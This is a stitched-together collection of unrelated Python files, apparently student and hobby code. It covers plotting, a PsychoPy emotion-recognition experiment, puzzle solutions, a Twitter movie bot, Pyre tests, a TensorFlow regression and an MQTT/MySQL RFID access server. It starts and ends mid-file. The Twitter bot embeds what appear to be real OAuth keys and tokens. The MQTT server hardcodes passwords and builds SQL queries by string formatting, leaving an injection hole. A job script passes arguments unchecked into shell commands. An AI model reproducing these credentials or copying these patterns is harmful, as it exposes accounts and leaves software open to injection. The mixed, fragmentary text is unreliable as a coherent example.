plt.plot(x,y2,label='15GB',linewidth=2, color='b', marker='o', ms=12, fillstyle='none',markeredgewidth=3)
plt.plot(x,y3,label='1.25GB',linewidth=2, color='m', marker='s', ms=12, fillstyle='none',markeredgewidth=3)
plt.plot(x,y4,label='2.5GB',linewidth=2, color='black', marker='+', ms=15, markeredgewidth=3)
plt.xlabel('Stage')
plt.ylabel('Time (s)',fontsize=30)
#plt.title('Stage Actual time VS predict time',fontsize=40)
#plt.xticks(index + bar_width, range(2),fontsize=30)
#plt.ylim(0,40)
plt.rcParams['font.size'] = 30
#plt.rc('ytick', labelsize=10)
#ax.get_yticklabels().set_fontsize(30)
plt.legend(fontsize=30,frameon=False,labelspacing=0,columnspacing=0,borderpad=0)
#plt.tight_layout()
#plt.grid(True,which='both', color='0.0')
plt.show()
|
d1 = {}
d2 = {}
n = int(input("Enter the number of values in dictionary 1: "))
for i in range(n):
key = int(input("Enter the key : "))
value = int(input("Enter the value : "))
d1[key] = value
n = int(input("Enter the number of values in dictionary 2 : "))
for i in range(n):
key = int(input("Enter the key : "))
value = int(input("Enter the value : "))
d2[key] = value
if d1 == d2:
print('The dictionaries are same')
else:
print("The dictionaries are not equal")
|
s=input("Enter any string:")
k=s.lower()
count=0
for i in k:
if(i=='o' or i=='a' or i=='i' or i=='e' or i=='u'):
count+=1
print("number of o:",count)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Fri Jan 17 14:46:44 2014
If you publish work using this script please cite the relevant PsychoPy publications
Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import division #so that 1/3=0.333 instead of 1/3=0
from psychopy import visual, core, data, event, logging, gui
from psychopy.constants import * #things like STARTED, FINISHED
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray
from numpy.random import random, randint, normal, shuffle
import os #handy system and path functions
#store info about the experiment session
expName='RMET_skeleton'#from the Builder filename that created this script
expInfo={'participant':'','group':'pilot', 'session':'001'}
dlg=gui.DlgFromDict(dictionary=expInfo,title=expName)
if dlg.OK==False: core.quit() #user pressed cancel
expInfo['date']=data.getDateStr()#add a simple timestamp
expInfo['expName']=expName
filename='data' + os.path.sep + '%s_%s_%s' %(expInfo['group'], expInfo['participant'], expInfo['session'])
logging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file
#an ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=None,
savePickle=True, saveWideText=False,
dataFileName=filename)
datFile=open(filename+'.txt','a')
datFile.write('Trial\tpicID\tanswer\thit\tRT\n')
#setup the Window
win = visual.Window(size=(1440, 900), fullscr=True, screen=0, allowGUI=False, allowStencil=False,
monitor=u'testMonitor', color=u'white', colorSpace=u'rgb')
#Initialise components for Routine "instr"
instrClock=core.Clock()
instructions=visual.TextStim(win=win, ori=0, name='instructions',
text="For each set of eyes, select the number corresponding to the word that best describes what the person in the picture is thinking or feeling. You may feel that more than one word is applicable, but please choose just one word, the word which you consider to be most suitable. Before making your choice, make sure that you have read all 4 words. You should try to do the task as quickly as possible but you will not be timed. Press 'enter' to begin.",
font='Arial',
pos=[0, 0], height=0.05,wrapWidth=None,
color='black', colorSpace='rgb', opacity=1,
depth=0.0)
#Initialise components for Routine "pract"
practClock=core.Clock()
practice=visual.PatchStim(win=win, name='practice',
tex='stimuli/pic00.jpg', mask=None,
ori=0, pos=[0, 0], size=[0.5, 0.5], sf=None, phase=0.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
texRes=128, interpolate=True, depth=0.0)
pract_w1=visual.TextStim(win=win, ori=0, name='pract_w1',
text='jealous',
font='Arial',
pos=[-0.5, 0.5], height=0.1,wrapWidth=None,
color='black', colorSpace='rgb', opacity=1,
depth=-1.0)
pract_w2=visual.TextStim(win=win, ori=0, name='pract_w2',
text='panicked',
font='Arial',
pos=[0.5, 0.5], height=0.1,wrapWidth=None,
color='black', colorSpace='rgb', opacity=1,
depth=-2.0)
pract_w3=visual.TextStim(win=win, ori=0, name='pract_w3',
text='arrogant',
font='Arial',
pos=[-0.5, -0.5], height=0.1,wrapWidth=None,
color='black', colorSpace='rgb', opacity=1,
depth=-3.0)
pract_w4=visual.TextStim(win=win, ori=0, name='pract_w4',
text='hateful',
font='Arial',
pos=[0.5, -0.5], height=0.1,wrapWidth=None,
color='black', colorSpace='rgb', opacity=1,
depth=-4.0)
#Initialise components for Routine "trial"
trialClock=core.Clock()
stimulus=visual.PatchStim(win=win, name='stimulus',
tex='sin', mask=None,
ori=0, pos=[0, 0], size=[0.5, 0.5], sf=None, phase=0.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
texRes=128, interpolate=True, depth=0.0)
trial_word1=visual.TextStim(win=win, ori=0, name='trial_word1',
text='nonsense',
font=u'Arial',
pos=[-0.5, 0.5], height=0.1,wrapWidth=None,
color=u'black', colorSpace=u'rgb', opacity=1,
depth=-1.0)
trial_word2=visual.TextStim(win=win, ori=0, name='trial_word2',
text='nonsense',
font=u'Arial',
pos=[0.5, 0.5], height=0.1,wrapWidth=None,
color=u'black', colorSpace=u'rgb', opacity=1,
depth=-2.0)
trial_word3=visual.TextStim(win=win, ori=0, name='trial_word3',
text='nonsense',
font=u'Arial',
pos=[-0.5, -0.5], height=0.1,wrapWidth=None,
color=u'black', colorSpace=u'rgb', opacity=1,
depth=-3.0)
trial_word4=visual.TextStim(win=win, ori=0, name='trial_word4',
text='nonsense',
font=u'Arial',
pos=[0.5, -0.5], height=0.1,wrapWidth=None,
color=u'black', colorSpace=u'rgb', opacity=1,
depth=-4.0)
# Create some handy timers
globalClock=core.Clock() #to track the time since experiment started
routineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine
#------Prepare to start Routine"instr"-------
t=0; instrClock.reset() #clock
frameN=-1
#update component parameters for each repeat
instr_resp = event.BuilderKeyResponse() #create an object of type KeyResponse
instr_resp.status=NOT_STARTED
#keep track of which components have finished
instrComponents=[]
instrComponents.append(instructions)
instrComponents.append(instr_resp)
for thisComponent in instrComponents:
if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED
#-------Start Routine "instr"-------
continueRoutine=True
while continueRoutine:
#get current time
t=instrClock.getTime()
frameN=frameN+1#number of completed frames (so 0 in first frame)
#update/draw components on each frame
#*instructions* updates
if t>=0.0 and instructions.status==NOT_STARTED:
#keep track of start time/frame for later
instructions.tStart=t#underestimates by a little under one frame
instructions.frameNStart=frameN#exact frame index
instructions.setAutoDraw(True)
#*instr_resp* updates
if t>=0.0 and instr_resp.status==NOT_STARTED:
#keep track of start time/frame for later
instr_resp.tStart=t#underestimates by a little under one frame
instr_resp.frameNStart=frameN#exact frame index
instr_resp.status=STARTED
#keyboard checking is just starting
instr_resp.clock.reset() # now t=0
event.clearEvents()
if instr_resp.status==STARTED:#only update if being drawn
theseKeys = event.getKeys(keyList=['return'])
if len(theseKeys)>0:#at least one key was pressed
instr_resp.keys=theseKeys[-1]#just the last key pressed
instr_resp.rt = instr_resp.clock.getTime()
#abort routine on response
continueRoutine=False
#check if all components have finished
if not continueRoutine: #a component has requested that we end
routineTimer.reset() #this is the new t0 for non-slip Routines
break
continueRoutine=False#will revert to True if at least one component still running
for thisComponent in instrComponents:
if hasattr(thisComponent,"status") and thisComponent.status!=FINISHED:
continueRoutine=True; break#at least one component has not yet finished
#check for quit (the [Esc] key)
if event.getKeys(["escape"]):
core.quit()
#refresh the screen
if continueRoutine:#don't flip if this routine is over or we'll get a blank screen
win.flip()
#End of Routine "instr"
for thisComponent in instrComponents:
if hasattr(thisComponent,"setAutoDraw"): thisComponent.setAutoDraw(False)
#------Prepare to start Routine"pract"-------
t=0; practClock.reset() #clock
frameN=-1
#update component parameters for each repeat
pract_resp = event.BuilderKeyResponse() #create an object of type KeyResponse
pract_resp.status=NOT_STARTED
#keep track of which components have finished
practComponents=[]
practComponents.append(practice)
practComponents.append(pract_w1)
practComponents.append(pract_w2)
practComponents.append(pract_w3)
practComponents.append(pract_w4)
practComponents.append(pract_resp)
for thisComponent in practComponents:
if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED
#-------Start Routine "pract"-------
continueRoutine=True
while continueRoutine:
#get current time
t=practClock.getTime()
frameN=frameN+1#number of completed frames (so 0 in first frame)
#update/draw components on each frame
#*practice* updates
if t>=0.0 and practice.status==NOT_STARTED:
#keep track of start time/frame for later
practice.tStart=t#underestimates by a little under one frame
practice.frameNStart=frameN#exact frame index
practice.setAutoDraw(True)
#*pract_w1* updates
if t>=0.0 and pract_w1.status==NOT_STARTED:
#keep track of start time/frame for later
pract_w1.tStart=t#underestimates by a little under one frame
pract_w1.frameNStart=frameN#exact frame index
pract_w1.setAutoDraw(True)
#*pract_w2* updates
if t>=0.0 and pract_w2.status==NOT_STARTED:
#keep track of start time/frame for later
pract_w2.tStart=t#underestimates by a little under one frame
pract_w2.frameNStart=frameN#exact frame index
pract_w2.setAutoDraw(True)
#*pract_w3* updates
if t>=0.0 and pract_w3.status==NOT_STARTED:
#keep track of start time/frame for later
pract_w3.tStart=t#underestimates by a little under one frame
pract_w3.frameNStart=frameN#exact frame index
pract_w3.setAutoDraw(True)
#*pract_w4* updates
if t>=0.0 and pract_w4.status==NOT_STARTED:
#keep track of start time/frame for later
pract_w4.tStart=t#underestimates by a little under one frame
pract_w4.frameNStart=frameN#exact frame index
pract_w4.setAutoDraw(True)
#*pract_resp* updates
if t>=0.0 and pract_resp.status==NOT_STARTED:
#keep track of start time/frame for later
pract_resp.tStart=t#underestimates by a little under one frame
pract_resp.frameNStart=frameN#exact frame index
pract_resp.status=STARTED
#keyboard checking is just starting
pract_resp.clock.reset() # now t=0
event.clearEvents()
if pract_resp.status==STARTED:#only update if being drawn
theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])
if len(theseKeys)>0:#at least one key was pressed
pract_resp.keys=theseKeys[-1]#just the last key pressed
pract_resp.rt = pract_resp.clock.getTime()
#was this 'correct'?
if (pract_resp.keys==str("'2'")): pract_resp.corr=1
else: pract_resp.corr=0
#abort routine on response
continueRoutine=False
#check if all components have finished
if not continueRoutine: #a component has requested that we end
routineTimer.reset() #this is the new t0 for non-slip Routines
break
continueRoutine=False#will revert to True if at least one component still running
for thisComponent in practComponents:
if hasattr(thisComponent,"status") and thisComponent.status!=FINISHED:
continueRoutine=True; break#at least one component has not yet finished
#check for quit (the [Esc] key)
if event.getKeys(["escape"]):
core.quit()
#refresh the screen
if continueRoutine:#don't flip if this routine is over or we'll get a blank screen
win.flip()
#End of Routine "pract"
for thisComponent in practComponents:
if hasattr(thisComponent,"setAutoDraw"): thisComponent.setAutoDraw(False)
#set up handler to look after randomisation of conditions etc
trials=data.TrialHandler(nReps=1, method=u'random',
extraInfo=expInfo, originPath=None,
trialList=data.importConditions('conditions.xlsx'),
seed=int(expInfo['participant']), name='trials')
thisExp.addLoop(trials)#add the loop to the experiment
thisTrial=trials.trialList[0]#so we can initialise stimuli with some values
#abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)
if thisTrial!=None:
for paramName in thisTrial.keys():
exec(paramName+'=thisTrial.'+paramName)
for thisTrial in trials:
currentLoop = trials
#abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)
if thisTrial!=None:
for paramName in thisTrial.keys():
exec(paramName+'=thisTrial.'+paramName)
#------Prepare to start Routine"trial"-------
t=0; trialClock.reset() #clock
frameN=-1
#update component parameters for each repeat
stimulus.setImage(stim)
trial_word1.setText(word1)
trial_word2.setText(word2)
trial_word3.setText(word3)
trial_word4.setText(word4)
key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse
key_resp.status=NOT_STARTED
#keep track of which components have finished
trialComponents=[]
trialComponents.append(stimulus)
trialComponents.append(trial_word1)
trialComponents.append(trial_word2)
trialComponents.append(trial_word3)
trialComponents.append(trial_word4)
trialComponents.append(key_resp)
for thisComponent in trialComponents:
if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED
#-------Start Routine "trial"-------
continueRoutine=True
while continueRoutine:
#get current time
t=trialClock.getTime()
frameN=frameN+1#number of completed frames (so 0 in first frame)
#update/draw components on each frame
#*stimulus* updates
if t>=0.0 and stimulus.status==NOT_STARTED:
#keep track of start time/frame for later
stimulus.tStart=t#underestimates by a little under one frame
stimulus.frameNStart=frameN#exact frame index
stimulus.setAutoDraw(True)
#*trial_word1* updates
if t>=0.0 and trial_word1.status==NOT_STARTED:
#keep track of start time/frame for later
trial_word1.tStart=t#underestimates by a little under one frame
trial_word1.frameNStart=frameN#exact frame index
trial_word1.setAutoDraw(True)
#*trial_word2* updates
if t>=0.0 and trial_word2.status==NOT_STARTED:
#keep track of start time/frame for later
trial_word2.tStart=t#underestimates by a little under one frame
trial_word2.frameNStart=frameN#exact frame index
trial_word2.setAutoDraw(True)
#*trial_word3* updates
if t>=0.0 and trial_word3.status==NOT_STARTED:
#keep track of start time/frame for later
trial_word3.tStart=t#underestimates by a little under one frame
trial_word3.frameNStart=frameN#exact frame index
trial_word3.setAutoDraw(True)
#*trial_word4* updates
if t>=0.0 and trial_word4.status==NOT_STARTED:
#keep track of start time/frame for later
trial_word4.tStart=t#underestimates by a little under one frame
trial_word4.frameNStart=frameN#exact frame index
trial_word4.setAutoDraw(True)
#*key_resp* updates
if t>=0.0 and key_resp.status==NOT_STARTED:
#keep track of start time/frame for later
key_resp.tStart=t#underestimates by a little under one frame
key_resp.frameNStart=frameN#exact frame index
key_resp.status=STARTED
#keyboard checking is just starting
key_resp.clock.reset() # now t=0
event.clearEvents()
if key_resp.status==STARTED:#only update if being drawn
theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])
if len(theseKeys)>0:#at least one key was pressed
key_resp.keys=theseKeys[-1]#just the last key pressed
key_resp.rt = key_resp.clock.getTime()
#was this 'correct'?
if (key_resp.keys==str(correctResponse)): key_resp.corr=1
else: key_resp.corr=0
#abort routine on response
continueRoutine=False
#check if all components have finished
if not continueRoutine: #a component has requested that we end
routineTimer.reset() #this is the new t0 for non-slip Routines
break
continueRoutine=False#will revert to True if at least one component still running
for thisComponent in trialComponents:
if hasattr(thisComponent,"status") and thisComponent.status!=FINISHED:
continueRoutine=True; break#at least one component has not yet finished
#check for quit (the [Esc] key)
if event.getKeys(["escape"]):
core.quit()
#refresh the screen
if continueRoutine:#don't flip if this routine is over or we'll get a blank screen
win.flip()
#End of Routine "trial"
for thisComponent in trialComponents:
if hasattr(thisComponent,"setAutoDraw"): thisComponent.setAutoDraw(False)
#check responses
if len(key_resp.keys)==0: #No response was made
key_resp.keys=None
#was no response the correct answer?!
if str(correctResponse).lower()=='none':key_resp.corr=1 #correct non-response
else: key_resp.corr=0 #failed to respond (incorrectly)
#store data for trials (TrialHandler)
trials.addData('key_resp.keys',key_resp.keys)
trials.addData('key_resp.corr',key_resp.corr)
if key_resp.keys != None:#we had a response
trials.addData('key_resp.rt',key_resp.rt)
thisExp.nextEntry()
#completed 1 repeats of 'trials'
datFile.write('%s\t%s\t%s\t%s\t%s\n'%(trials.thisTrialN+1,stim[11:13],key_resp.keys,key_resp.corr,key_resp.rt))
#save data for this loop
#trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')
#Shutting down:
win.close()
core.quit()
|
@dataclasses.dataclass
class Nodes(Variable):
name: str = 'nodes'
def __post_init__(self):
self.yr = self.g.shapes_yr
self.level = self.g.level
self.attrs = listify(self.g.node_attrs) + listify(Districts)
super().__post_init__()
def get(self):
exists = super().get()
if not exists['df']:
self.df = (read_table(self.g.combined.tbl, cols=self.attrs)
.rename(columns={'total':'pop'}).set_index('geoid')) |
N, M = map(int, input().split()) # N = total number of trees, M = Target total lenght of trees
trees_length = list(map(int, input().split()))
max_tree = max(trees_length)
cut_heigth = []
for i in range(1, max_tree):
cut_heigth.append(i)
total_cut_lengths = []
for j in cut_heigth:
cut_tot_len = 0
for k in trees_length:
# total_cut_length = 0
j_cut = [j]
if k >= j:
cut_tot_len += (k - j)
# print(total_cut_length)
else:
cut_tot_len += 0
j_cut.append(cut_tot_len)
# print(cut_len)
total_cut_lengths.append(j_cut)
# print(lengths)
print(total_cut_lengths)
def is_target_length(target, array):
current_min = 0
current_max = len(array) - 1
current_guess = (current_min + current_max) // 2
while current_min <= current_max:
if M == array[current_guess][1]:
return array[current_guess][0]
elif M < array[current_guess][1]:
current_min = current_guess + 1
else:
current_max = current_guess - 1
current_guess = (current_min + current_max)//2
return array[current_guess][0]
print(is_target_length(M, total_cut_lengths)) |
"""
Program: customer.py
Author: Paul Ford
Last date modified: 07/1/2020
Purpose: Create my first class
"""
class Customer:
"""Customer Class"""
# Constructor
def __init__(self, cust_id, lname, fname, pnumber):
# check to see if first and last name is alpha characters, if not throw exception
name_characters = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!'- ' '")
if not (name_characters.issuperset(str(lname))):
raise InvalidNameException
if not (name_characters.issuperset(str(fname))):
raise InvalidNameException
# first check to see if number is 12 digits long
if len(pnumber) != 12:
raise InvalidPhoneNumberFormat
# now check for the dashes in the right spot
for i in range(12):
if i in [3, 7]:
if pnumber[i] != '-':
raise InvalidPhoneNumberFormat
# last verify all the values are numbers
elif not pnumber[i].isalnum():
raise InvalidPhoneNumberFormat
# check to see if its an int
if not isinstance(cust_id, int):
raise InvalidCustomerIdException
# check range
if cust_id < 1000 or cust_id > 9999:
raise InvalidCustomerIdException
# setting attributes
self._customer_id = cust_id
self._last_name = lname
self._first_name = fname
self._phone_number = pnumber
def __str__(self):
"""
dispalys objects
:return: un formatted str
"""
return str(self._customer_id) + ", " + \
self._last_name + ", " + self._first_name + ", " + \
self._phone_number
def __repr__(self):
"""
format the string object
:return: formatted version of object
"""
return "Customer ID: " + str(self._customer_id) + '\n' \
"Name: " + self._last_name + " " + self._first_name + '\n' \
"Phone: " + self._phone_number + '\n' \
# Methods
def display(self):
"""
confirms that custID is a number and displays the object attrubutes
:return: formatted string of the attributes
"""
if isinstance(self._customer_id, int):
return self.__repr__()
else:
raise AttributeError("'Customer' object has no attribute 'cid'")
class InvalidCustomerIdException(Exception):
pass
class InvalidNameException(Exception):
pass
class InvalidPhoneNumberFormat(Exception):
pass
# Drivers
try:
cust = Customer(99, 'Paul', 'Ford', '123-123-1234')
except InvalidCustomerIdException:
print('The customerID is incorrect.')
try:
cust = Customer(99, 3434, 'Ford', '123-123-1234')
except InvalidNameException:
print('First name is incorrect')
try:
cust = Customer(99, 'Paul', 41234, '123-123-1234')
except InvalidNameException:
print('Last name is incorrect')
try:
cust = Customer(99, 'Paul', 'Ford', '123-123-124')
except InvalidPhoneNumberFormat:
print('Phone number is in the wrong format')
|
"""
How it works / Logic flow
1a. Bot listens to the keyword "rtindru"
- Tweepy returns list of tweets
1b. Bot checks if the tweet is about "recommend movie"
2. Bot asks the user "what's your favorite movie?" - we got the movie_name inside the main function
- User responds with the movie name
3a.Takes
3b.Bot gets recommendations from movie api
4. Bot replies to the user with top 2/3 recommendations
"""
import tweepy
auth = tweepy.OAuthHandler('wnHnUjjJVfGKIkjgAlAWIX7Ii', 'hLcXusk6opqfFJETXJAF4dzMx5x8Pr4v0TH22cGwY5SMRHPJhU')
auth.set_access_token('54509995-ZTtceIZD0esJ57apOshkRK5O8tKCeGCa82x7p7osF', 'Pnbrj0tapaPHBeGGShASEccBtrPIibEyVa1TgYnZW4MOq')
api = tweepy.API(auth)
class RecommendStreamListener(tweepy.StreamListener):
def on_status(self, status):
print("RecommendStreamListener", status.text)
text = "@{} What's your favorite movie?".format(status.user.screen_name)
reply = api.update_status(text, in_reply_to_status_id=status.id)
print("Reply ID", reply.id)
class ResponseStreamListener(tweepy.StreamListener):
def on_status(self, status):
print("ResponseStreamListener", status.text)
def main():
"""
Goal: Searches twitter for the user name "rtindru"
Input: str, user_name to search tweets for
Output: All tweets with the username
"""
respStreamListener = ResponseStreamListener()
respStream = tweepy.Stream(auth = api.auth, listener=respStreamListener, is_async=True)
respStream.filter(follow=["54509995"])
recStreamListener = RecommendStreamListener()
recStream = tweepy.Stream(auth = api.auth, listener=recStreamListener)
recStream.filter(track=["goosfraba recommendation movie", "@rtindru recommend movie"], is_async=True)
def get_movie_name():
pass
def bot_recc(movie_name):
"""
Goal: Get recommends from API
Input: str, movie_name provides movie name
Output: Top 3 best movies
"""
pass
def reply_recc():
pass
if __name__ == "__main__":
main()
|
import unittest
from unittest.mock import MagicMock
from .. import query_api
class QueryAPITest(unittest.TestCase):
def test_defines(self) -> None:
pyre_connection = MagicMock()
pyre_connection.query_server.return_value = {
"response": [
{
"name": "a.foo",
"parameters": [{"name": "x", "annotation": "int"}],
"return_annotation": "int",
}
]
}
self.assertEqual(
query_api.defines(pyre_connection, ["a"]),
[
query_api.Define(
name="a.foo",
parameters=[query_api.DefineParameter(name="x", annotation="int")],
return_annotation="int",
)
],
)
def test_get_class_hierarchy(self) -> None:
pyre_connection = MagicMock()
pyre_connection.query_server.return_value = {
"response": [{"Foo": ["object"]}, {"object": []}]
}
self.assertEqual(
query_api.get_class_hierarchy(pyre_connection),
{"Foo": ["object"], "object": []},
)
pyre_connection.query_server.return_value = {
"response": [
{"Foo": ["object"]},
{"object": []},
# This should never happen in practice, but unfortunately is something
# to consider due to the type of the JSON returned. The last entry wins.
{"Foo": ["Bar"]},
{"Bar": ["object"]},
]
}
self.assertEqual(
query_api.get_class_hierarchy(pyre_connection),
{"Foo": ["Bar"], "Bar": ["object"], "object": []},
)
pyre_connection.query_server.return_value = {"error": "Found an issue"}
self.assertEqual(query_api.get_class_hierarchy(pyre_connection), None)
def test_get_call_graph(self) -> None:
pyre_connection = MagicMock()
pyre_connection.query_server.return_value = {
"response": {
"async_test.foo": [],
"async_test.bar": [
{
"locations": [
{
"path": "async_test.py",
"start": {"line": 6, "column": 4},
"stop": {"line": 6, "column": 7},
}
],
"kind": "function",
"target": "async_test.foo",
}
],
}
}
self.assertEqual(
query_api.get_call_graph(pyre_connection),
{
"async_test.foo": [],
"async_test.bar": [
query_api.CallGraphTarget(
target="async_test.foo",
kind="function",
locations=[
query_api.Location(
path="async_test.py",
start=query_api.Position(line=6, column=4),
stop=query_api.Position(line=6, column=7),
)
],
)
],
},
)
|
'''
Create a BMI calculator, BMI which stands for Body Mass Index can be calculated using the formula:
BMI = (weight in Kg)/(Height in Meters)^2.
Write python code which can accept the weight and height of a person and calculate his BMI.
note: Make sure to use a function which accepts the height and weight values and returns the BMI value.
'''
def BMC(w, h):
BMI= w/pow(h, 2)
return BMI
w = float(input('Enter the weight of the person'))
h = float(input('Enter the height of the person'))
#print(type(w))
#print(type(h))
c = BMC(w, h)
print('The BMI value='+str(c)) |
import tensorflow as tf
import numpy as np
from sklearn import preprocessing
trees = np.loadtxt('Data/Data/trees.csv', delimiter=',', dtype=np.float32, skiprows=1)
# trees = preprocessing.add_dummy_feature(trees)
trees = np.insert(trees, 0, np.ones(31), axis=1)
xx = trees[:, :-1]
y = trees[:, -1:]
print(xx.shape, y.shape)
x = tf.placeholder(tf.float32, shape=[None, 3])
w = tf.Variable(tf.random_normal([3, 1], -1, 1))
hx = tf.matmul(x, w)
cost = tf.reduce_mean((hx - y) ** 2)
optimizer = tf.train.GradientDescentOptimizer(0.0001)
train = optimizer.minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(10):
sess.run(train, {x: xx})
print(i, sess.run(cost, {x: xx}))
y_hat = sess.run(hx, {x: xx})
print(y_hat)
y_hat = sess.run(hx, {x: [[1., 10., 70.], [1., 15., 80.]]})
print(y_hat)
sess.close() |
# FAZENDO OS IMPORTS NECESSARIOS PARA A APLICACAO
import json
import sys
import os, urlparse
import paho.mqtt.client as mqtt
import pymysql
#import cgitb
from datetime import datetime
ipMV = sys.argv[1]
# CONEXAO COM O BANCO - DATABASE, USUARIO, SENHA E HOST
conn = pymysql.connect(
db='dbru',
user='admin',
passwd='admin123',
host=ipMV)
c = conn.cursor()
#cgitb.enable()
# CODIGO DE CONSULTA AO BANCO
# VERIFICA SE O RFID PASSADO EXISTE NO BANCO
# SE SIM, RETORNA UMA LISTA CONTENDO NOME E ID DO USUARIO CADASTRADO
# NAQUELE RFID
def consulta(num):
retorno = {}
retorno["userId"] = 0
retorno["userName"] = ""
sql = "SELECT id,nome FROM Usuario WHERE rfid = '%s'" % (num)
c.execute(sql)
r = c.fetchall()
if len(r) > 0:
retorno["userId"] = int(r[0][0])
retorno["userName"] = r[0][1] + ""
return retorno
# VERIFICA SE DADO USUARIO POSSUI REGISTRO ABERTO ASSOCIADO A SEU RFID
# CASO NAO HAJA, O HORARIO E REGISTRADO E TEM SEU SATUS DEFINIDO COMO ABERTO (1).
# CASO HAJA, O HORARIO E REGISTRADO E O STATUS DEFINIDO COMO FECHADO (0)
'''def registro(userData):
try:
sql_consulta = "SELECT id FROM History WHERE idUser = %i AND status = 1;" % (userData["userId"])
c.execute(sql_consulta)
r = c.fetchall()
if len(r) > 0:
timestamp = datetime.now()
id_hist = r[0][0]
sql_update = "UPDATE `History` SET `status` = 0, `saida` = '%s' WHERE id = %i;" % (timestamp,id_hist)
#print sql_update
c.execute(sql_update)
conn.commit()
return "SAINDO/" + userData["userName"]
else:
sql_insert = "INSERT INTO History (idUser,status) VALUES (%i,1);" % (userData["userId"])
c.execute(sql_insert)
conn.commit()
return "ENTRANDO/" + userData["userName"]
except:
return "ERRO";'''
# SOBREESCREVEMOS O COMPORTAMENTO DE ALGUMAS
# FUNCOES PROPRIAS DO MQTT
# EXECUTADA QUANDO UMA NOVA CONEXAO E FEITA
def on_connect(self, mosq, obj, rc):
print("rc: " + str(rc))
# EXECUTADA QUANDO UMA NOVA MENSAGEM E LIDA NA FILA
# PUBLICA NA FILA DE RESPOSTA SE O ACESSO FOI/NAO FOI LIBERADO
# + O NOME DO CADASTRADO PARA EXIBICAO NO LCD
def on_message(mosq, obj, msg):
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
mensagem = msg.payload
print type(mensagem)
mjson = json.loads(mensagem)
print mjson['nome']
'''cons = consulta(str(msg.payload))
if(cons["userName"] != ""):
#retorno = registro(cons)
retorno = "%s" % cons
else:
retorno = "Usuario nao cadastrado."
mqttc.publish("retorno", retorno)
print(retorno) '''
# EXECUTADO A CADA PUBLICACAO
def on_publish(mosq, obj, mid):
print("Publish: " + str(mid))
# EXECUTADO A CADA FILA QUE UM SUBSCRIBE E DADO
def on_subscribe(mosq, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
# EXECUTADO EM CADA ESCRITA NO LOG
def on_log(mosq, obj, level, string):
print(string)
# CRIACAO DO OBJETO DO TIPO mqtt.Client
mqttc = mqtt.Client()
# SOBRESCRITA DOS METODOS NATIVOS DO MQTT
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# URL DO CLOUDMQTT E DA INSTANCIA AONDE AS FILAS ESTAO
# A URL DA INSTANCIA E COMPOSTA POR: mqtt://m12.cloudmqtt.com: + PORTA
# PORTA PODE SER ENCONTRADO NAS INFORMACOES DA INSTANCIA
url_str = os.environ.get('m10.cloudmqtt.com','mqtt://m10.cloudmqtt.com:16184')
url = urlparse.urlparse(url_str)
# ATRIBUICAO DO USUARIO COM ACESSO AS FILAS
#os parametros do username_pw_set sao os dados usuario e senha do MQTT
mqttc.username_pw_set("adm", "54321")
mqttc.connect(url.hostname, url.port)
# SUBSCRIBE NA FILA ACESSO
mqttc.subscribe("acesso", 0)
# LOOP ENQUANTO UM ERRO NAO FOR ENCONTRADO O NOSSO SERVIDOR ESTARA OUVINDO A FILA
# ACESSO E ESCREVENDO AS RESPOSTAS NA FILA RETORNO
rc = 0
while rc == 0:
rc = mqttc.loop()
print("rc: " + str(rc))
|
class Sentinel:
"""A sentinel which is always bigger than anything"""
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __gt__(self, other):
return True
def __ge__(self, other):
return True
if __name__ == '__main__':
s = Sentinel()
print(5 >= s)
print(s >= 56)
|
#!/usr/bin/python
import os,sys
mss = os.environ['MSS']
outpath = os.environ['VOL']+'/data'
imax = 0
run = ''
action = 'request'
args = sys.argv
if len(args)<2: sys.exit('no arguments')
for i,a in enumerate(args):
if a in ['-r','-run']: run = args[i+1].zfill(6)
elif a in ['-m','-max']: imax = int(args[i+1])
elif a in ['-f','-from']: mss = args[i+1]
elif a in ['-t','-to']: outpath = args[i+1]
elif a in ['-c','-cancel']: action = 'cancel'
elif a in ['-v','-view']: action = 'view'
# request files
if action=='request':
l = [mss+'/'+x for x in os.listdir(mss) if run in x]
l.sort()
l.sort(key=len)
if imax!=0: l = l[:imax+1]
for x in l:
print 'copy file {0} to {1}'.format(x,outpath)
os.system('jget -n {0} {1}'.format(x,outpath))
# view queue
elif action=='view':
if run=='': os.system('jqueue user mlevilla request jobState submit stub' )
else: os.system('jqueue user mlevilla request jobState submit stub | grep '+run)
# cancel jobs
elif action=='cancel':
f= os.popen('jqueue user mlevilla request stub' )
l = [x.split(' ') for x in f.readlines()[1:] if run in x]
for x in l:
while x[0]=='': del x[0]
os.system('jcancel '+x[0])
sys.exit(0)
|
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, Table, String, Date, UniqueConstraint
from models.base_model import Base
teacher_subject_links = Table('teacher_subject', Base.metadata,
